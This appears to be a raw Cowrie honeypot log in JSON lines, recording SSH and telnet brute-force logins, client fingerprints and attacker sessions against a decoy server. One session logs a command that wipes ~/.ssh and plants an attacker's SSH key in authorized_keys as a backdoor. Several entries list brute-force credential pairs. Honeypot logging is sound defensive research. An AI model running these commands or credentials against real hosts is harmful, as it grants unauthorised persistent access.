{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:06:43.997489Z","src_ip":"212.227.235.229","session":"6c2eba986e87"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:06:45.015324Z","src_ip":"212.227.235.229","session":"6c2eba986e87"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":39444,"dst_ip":"1.2.3.4","dst_port":23,"session":"bef3a893096d","protocol":"telnet","message":"New connection: 79.124.8.120:39444 (1.2.3.4:23) [session: bef3a893096d]","sensor":"my-vps","timestamp":"2025-09-09T06:06:45.174294Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:06:45.214537Z","src_ip":"79.124.8.120","session":"bef3a893096d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:06:45.236813Z","src_ip":"79.124.8.120","session":"bef3a893096d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:46.262290Z","src_ip":"212.227.235.229","session":"6c2eba986e87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59686,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd123380ccde","protocol":"ssh","message":"New connection: 212.227.235.229:59686 (1.2.3.4:22) [session: dd123380ccde]","sensor":"my-vps","timestamp":"2025-09-09T06:06:46.503125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:06:46.503877Z","src_ip":"212.227.235.229","session":"dd123380ccde"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:06:46.745447Z","src_ip":"212.227.235.229","session":"dd123380ccde"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:06:47.752735Z","src_ip":"212.227.235.229","session":"dd123380ccde"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:47.993525Z","src_ip":"212.227.235.229","session":"822f20437758"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:47.996033Z","src_ip":"212.227.235.229","session":"dd123380ccde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35456,"dst_ip":"1.2.3.4","dst_port":22,"session":"49a4e0c36b4a","protocol":"ssh","message":"New connection: 212.227.235.229:35456 (1.2.3.4:22) [session: 49a4e0c36b4a]","sensor":"my-vps","timestamp":"2025-09-09T06:06:53.547620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:06:53.550864Z","src_ip":"212.227.235.229","session":"49a4e0c36b4a"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:06:53.732391Z","src_ip":"212.227.235.229","session":"49a4e0c36b4a"}
{"eventid":"cowrie.login.success","username":"root","password":"aaaaaa","message":"login attempt [root/aaaaaa] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:06:54.476944Z","src_ip":"212.227.235.229","session":"49a4e0c36b4a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:06:54.929405Z","src_ip":"212.227.235.229","session":"49a4e0c36b4a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:06:54.930137Z","src_ip":"212.227.235.229","session":"49a4e0c36b4a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:06:54.930999Z","src_ip":"212.227.235.229","session":"49a4e0c36b4a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:55.296626Z","src_ip":"212.227.235.229","session":"49a4e0c36b4a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:06:55.565718Z","src_ip":"212.227.235.229","session":"49a4e0c36b4a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:06:55.566523Z","src_ip":"212.227.235.229","session":"49a4e0c36b4a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:06:55.757899Z","src_ip":"212.227.235.229","session":"49a4e0c36b4a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:55.758858Z","src_ip":"212.227.235.229","session":"49a4e0c36b4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36324,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc52f2c5be08","protocol":"ssh","message":"New connection: 212.227.235.229:36324 (1.2.3.4:22) [session: bc52f2c5be08]","sensor":"my-vps","timestamp":"2025-09-09T06:06:55.927321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:06:55.933817Z","src_ip":"212.227.235.229","session":"bc52f2c5be08"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:06:56.112975Z","src_ip":"212.227.235.229","session":"bc52f2c5be08"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:06:56.818619Z","src_ip":"212.227.235.229","session":"bc52f2c5be08"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:58.003996Z","src_ip":"212.227.235.229","session":"bc52f2c5be08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36866,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfe3f0f5885c","protocol":"ssh","message":"New connection: 212.227.235.229:36866 (1.2.3.4:22) [session: bfe3f0f5885c]","sensor":"my-vps","timestamp":"2025-09-09T06:06:58.166420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:06:58.175310Z","src_ip":"212.227.235.229","session":"bfe3f0f5885c"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:06:58.344091Z","src_ip":"212.227.235.229","session":"bfe3f0f5885c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:06:59.033827Z","src_ip":"212.227.235.229","session":"bfe3f0f5885c"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:59.215955Z","src_ip":"212.227.235.229","session":"bfe3f0f5885c"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:59.227255Z","src_ip":"212.227.235.229","session":"49a4e0c36b4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37446,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0dc205d6203","protocol":"ssh","message":"New connection: 212.227.235.229:37446 (1.2.3.4:22) [session: a0dc205d6203]","sensor":"my-vps","timestamp":"2025-09-09T06:07:14.315236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:07:14.316287Z","src_ip":"212.227.235.229","session":"a0dc205d6203"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:07:14.397030Z","src_ip":"212.227.235.229","session":"a0dc205d6203"}
{"eventid":"cowrie.login.failed","username":"gitrun","password":"gitrun@123","message":"login attempt [gitrun/gitrun@123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:07:14.752729Z","src_ip":"212.227.235.229","session":"a0dc205d6203"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:07:15.834028Z","src_ip":"212.227.235.229","session":"a0dc205d6203"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42148,"dst_ip":"1.2.3.4","dst_port":22,"session":"6393aa056894","protocol":"ssh","message":"New connection: 212.227.235.229:42148 (1.2.3.4:22) [session: 6393aa056894]","sensor":"my-vps","timestamp":"2025-09-09T06:07:19.287797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:07:19.289871Z","src_ip":"212.227.235.229","session":"6393aa056894"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:07:19.459004Z","src_ip":"212.227.235.229","session":"6393aa056894"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T06:07:20.303843Z","src_ip":"212.227.235.229","session":"6393aa056894"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:07:21.473825Z","src_ip":"212.227.235.229","session":"6393aa056894"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58666,"dst_ip":"1.2.3.4","dst_port":22,"session":"512350d32b65","protocol":"ssh","message":"New connection: 217.72.205.35:58666 (1.2.3.4:22) [session: 512350d32b65]","sensor":"my-vps","timestamp":"2025-09-09T06:07:48.830365Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:07:48.832216Z","src_ip":"217.72.205.35","session":"512350d32b65"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":40152,"dst_ip":"1.2.3.4","dst_port":22,"session":"e164f2515703","protocol":"ssh","message":"New connection: 92.118.39.62:40152 (1.2.3.4:22) [session: e164f2515703]","sensor":"my-vps","timestamp":"2025-09-09T06:08:04.706066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:08:04.706849Z","src_ip":"92.118.39.62","session":"e164f2515703"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:08:04.736142Z","src_ip":"92.118.39.62","session":"e164f2515703"}
{"eventid":"cowrie.login.failed","username":"bin","password":"bin","message":"login attempt [bin/bin] failed","sensor":"my-vps","timestamp":"2025-09-09T06:08:04.855806Z","src_ip":"92.118.39.62","session":"e164f2515703"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:08:05.887698Z","src_ip":"92.118.39.62","session":"e164f2515703"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55376,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7e482f4d776","protocol":"ssh","message":"New connection: 212.227.235.229:55376 (1.2.3.4:22) [session: f7e482f4d776]","sensor":"my-vps","timestamp":"2025-09-09T06:08:07.972220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:08:07.973134Z","src_ip":"212.227.235.229","session":"f7e482f4d776"}
